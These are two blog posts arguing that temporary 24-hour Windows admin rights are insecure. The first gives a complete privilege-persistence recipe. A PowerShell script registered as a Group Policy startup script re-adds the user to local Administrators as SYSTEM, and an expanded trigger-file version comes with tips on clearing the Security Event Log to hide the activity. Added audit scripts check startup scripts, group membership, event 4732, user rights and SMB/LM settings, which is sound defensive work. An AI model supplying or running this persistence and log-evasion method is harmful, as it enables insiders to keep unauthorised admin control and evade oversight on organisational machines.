19 January 2015
Once you have granted a user 24h admin rights, he can grant himself permanent privileges with just a few clicks. Startup scripts are an easy means to do this.
About startup scripts.
With startup scripts Windows offers administrators a powerful tool to run commands at system boot. Scripts are stored in the directory %windir%\System32\GroupPolicy\Machine\Scripts\Startup and run under the LocalSystem account, before any user logs on.
But just copying a script into the startup directory is not sufficient to get it executed. Because startup scripts could easily be used to compromise a system, they have to be registered in the local Group Policy through the Local Group Policy Editor gpedit.msc, and that registration requires local admin privileges. This is exactly what a 24h admin has: once the script is registered, it keeps running as SYSTEM at every boot, long after the 24h admin rights have been revoked.
3 Steps for 24h admins to get admin privileges again.
- Create a PowerShell script for adding your user account to the local administrators group.
$Domain = "YourDomain"
$Computer = "YourComputer"
$Username = "YourUsername"
# Bind to the local Administrators group and to the domain account via the WinNT ADSI provider.
$Group = [ADSI]"WinNT://$Computer/Administrators,group"
$User = [ADSI]"WinNT://$Domain/$Username,user"
# Add the account to the group. The script runs as SYSTEM at boot, so this succeeds even after the 24h admin rights have been revoked.
$Group.Add($User.Path)
Save this script to the file addMalUser.ps1. To get the exact values for $Domain, $Computer and $Username, run set in a command prompt and read them from the USERDOMAIN, COMPUTERNAME and USERNAME environment variables.
- Copy script addMalUser.ps1 to %windir%\System32\GroupPolicy\Machine\Scripts\Startup.
- Start gpedit.msc, navigate to Computer Configuration > Windows Settings > Scripts (Startup/Shutdown), open Startup and add addMalUser.ps1 on the PowerShell Scripts tab.
Gpedit Add Startup Script Dialog
Tips for would-be malicious users.
- Please note that adding an account to the local Administrators group is recorded in the Security Event Log of your computer (event 4732, provided Security Group Management auditing is enabled).
Never mind! Only very few organizations scan security events on user workstations. Those which tolerate 24h admin rights are certainly not amongst them.
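For the administrators among the readers, the following script is the check this tip calls for. It is an added example, not part of the original post: it lists the scripts registered in the local GPO, the files in the Startup folder, the current members of the local Administrators group and the last 4732 events. It assumes that gpedit.msc records PowerShell startup scripts in psscripts.ini and batch scripts in scripts.ini under the Scripts folder, and that it is run from an elevated PowerShell on the workstation.

```powershell
# Added check, not from the original post: what did a 24h admin leave behind?
# Run from an elevated PowerShell on the workstation to be checked.
$scriptsDir = Join-Path $env:windir "System32\GroupPolicy\Machine\Scripts"

# 1. Scripts registered in the local GPO. Assumption: gpedit.msc stores batch
#    scripts in scripts.ini and PowerShell scripts in psscripts.ini (both hidden).
foreach ($ini in "scripts.ini", "psscripts.ini") {
    $path = Join-Path $scriptsDir $ini
    if (Test-Path $path) {
        Write-Output "== $ini =="
        Get-Content $path | Where-Object { $_ -match '^\[|CmdLine=|Parameters=' }
    }
}

# 2. Everything dropped into the Startup folder, newest first.
Write-Output "== Startup folder =="
Get-ChildItem (Join-Path $scriptsDir "Startup") -Force -ErrorAction SilentlyContinue |
    Sort-Object LastWriteTime -Descending |
    Select-Object LastWriteTime, Length, FullName

# 3. Current members of the local Administrators group
#    (same WinNT ADSI provider the attack script uses).
Write-Output "== Local Administrators =="
$group = [ADSI]"WinNT://$env:COMPUTERNAME/Administrators,group"
$group.psbase.Invoke("Members") | ForEach-Object {
    $_.GetType().InvokeMember("ADsPath", 'GetProperty', $null, $_, $null)
}

# 4. Security log: 4732 = "A member was added to a security-enabled local group".
#    Only present if Security Group Management auditing is enabled.
Write-Output "== Recent 4732 events =="
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4732 } -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } }
```

Any CmdLine entry in the ini files that you did not deploy yourself, and any file in the Startup folder with a LastWriteTime inside a 24h admin window, deserves a closer look; the 4732 events tell you who was added, but only if the audit policy was switched on before the window.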
- Please feel free to add a switch to this script, e.g. a check for a trigger file, so that it adds your account on demand only. This helps to hide your malicious activities, because you can remove yourself from the admin group or clear the Security Event Log after the job is done; the script silently restores your membership at the next boot when you need it again.
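Putting the three steps above and this tip together, here is a complete version of addMalUser.ps1 with a trigger-file switch. This is an added example, not the script from the original post; the domain, computer and user names and the trigger path are placeholders.

```powershell
# addMalUser.ps1 - added example, not the original post's script.
# Registered as a Group Policy startup script it runs as SYSTEM at every boot.
# Placeholders: domain, computer and user name, and the trigger path.
$Domain   = "YourDomain"
$Computer = "YourComputer"
$Username = "YourUsername"

# The "switch": act only when this file exists. A standard user can create it
# (C:\Users\Public is writable by everyone) and the script removes it afterwards,
# so the account is re-added on demand only, not at every boot.
$Trigger = "C:\Users\Public\doit"
if (-not (Test-Path $Trigger)) { exit 0 }

# Bind to the local Administrators group and the domain account (WinNT ADSI provider).
$Group = [ADSI]"WinNT://$Computer/Administrators,group"
$User  = [ADSI]"WinNT://$Domain/$Username,user"

# Current member names, so that the script does not fail (and log an error)
# when the account is already a member.
$members = @($Group.psbase.Invoke("Members") | ForEach-Object {
    $_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null)
})
if ($members -notcontains $Username) {
    $Group.Add($User.Path)
}

# Consume the trigger so the next boot is silent again.
Remove-Item $Trigger -Force
```

Usage: create the trigger file as a standard user (New-Item C:\Users\Public\doit) and reboot; the account is in Administrators when you log on. After the job, an elevated net localgroup Administrators YourDomain\YourUsername /delete takes it out again, and the next boot with a fresh trigger file puts it back.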
Have Fun with 24h Admin Rights!
17 January 2015
If you work in the IT group of a (large) enterprise you have certainly heard statements like
- It’s often cheaper to give a user admin rights to install something versus assigning a technician to do installation work.
- I need admin rights for 24h because the installation of this software suite takes a whole working day. I can’t get my job done because the technician blocks my computer all day.
Generally IT groups quickly come forward with some tools because they don't want to slow down business, and very often before business puts too much pressure on them.
A very easy solution is to grant the user admin privileges for 12 or 24 hours. Procedures like the following are very popular:
- Tell the user the password of the local administrator account on the user’s computer. Reset the password after 24 hours.
- Add the user's account for 24 hours to the local administrators group.
- Create a new local account with admin privileges on the user’s computer and make the login data available to the user. Remove the local account after 24 hours.
This sounds pretty secure, doesn't it? Unfortunately all this is just window-dressing. We create potential security holes of barn-door size which could be used by a malicious insider to attack the entire network.
Just some comments on the apparently secure procedures above. A user with administrative privileges
- Could create an additional administrator account for later use. This is easy to detect and to fix.
- Could grant local user rights like 'Act as part of the operating system' (SeTcbPrivilege) or 'Log on as a service' (SeServiceLogonRight) to his standard domain account. These rights are tied to the account, not to the group membership, so they survive the removal from the administrators group, and the effort to detect changes of this sort is considerably higher.
- Could weaken network protocol signing and encryption settings, e.g. SMB signing or the LAN Manager authentication level. This will allow a malicious insider to capture and crack passwords …
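Changes of the second and third kind are the hard ones to spot. As an added example (not from the original post), the following script exports the workstation's user-rights assignments and reads the LM/NTLM and SMB-signing settings a local admin could have weakened. The privilege names and registry values are the standard Windows ones; the temporary file path is an assumption, and the output is meant to be compared against a known-good baseline.

```powershell
# Added example, not from the original post: snapshot the local settings a
# temporary admin could have changed. Run from an elevated PowerShell.
$inf = Join-Path $env:TEMP "secpol.inf"   # assumed scratch location

# secedit exports the local security policy as a Unicode .inf file.
secedit /export /cfg $inf /quiet | Out-Null

# [Privilege Rights] section. SeTcbPrivilege = "Act as part of the operating
# system", SeServiceLogonRight = "Log on as a service", SeDebugPrivilege =
# "Debug programs". Values are lists of SIDs or account names.
Write-Output "== User rights assignments =="
Get-Content $inf -Encoding Unicode |
    Select-String '^(SeTcbPrivilege|SeServiceLogonRight|SeDebugPrivilege)\s*=' |
    ForEach-Object { $_.Line }
Remove-Item $inf -Force

# Authentication and signing settings a local admin can weaken:
#   LmCompatibilityLevel < 3   -> client may send LM / NTLMv1 responses
#   NoLMHash = 0               -> LM hashes of local passwords are stored
#   RequireSecuritySignature = 0 (workstation/server) -> SMB signing not required
Write-Output "== LM/NTLM and SMB signing =="
$checks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Name = 'LmCompatibilityLevel' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Name = 'NoLMHash' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'; Name = 'RequireSecuritySignature' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'; Name = 'RequireSecuritySignature' }
)
foreach ($c in $checks) {
    $v = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    "{0}\{1} = {2}" -f $c.Path, $c.Name, $(if ($null -eq $v) { '<not set>' } else { $v })
}
```

A standard domain account appearing next to SeTcbPrivilege or SeServiceLogonRight, or a signing value that is lower than the domain policy prescribes, is the kind of change the 24h admin left behind; because these settings live in local policy and the registry rather than in group membership, the daily "who is in Administrators" report never shows them.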
To be honest, there is no secure way to take local admin privileges back from a user except by reinstalling his computer, but …
This 24h admin rights discussion is in my opinion a matter of leadership. The response of the IT leaders and the business leaders to such requests should be a crystal clear No, because we put the business at risk. And the IT groups have to find ways to support the users in a timely manner.
By the way, from an economical point of view it does not make sense for highly paid experts to install software on their computers. That's just a waste of creativity. Maybe this is a good argument for business leaders to refuse the next request for 24 hours admin rights.
Have a good weekend.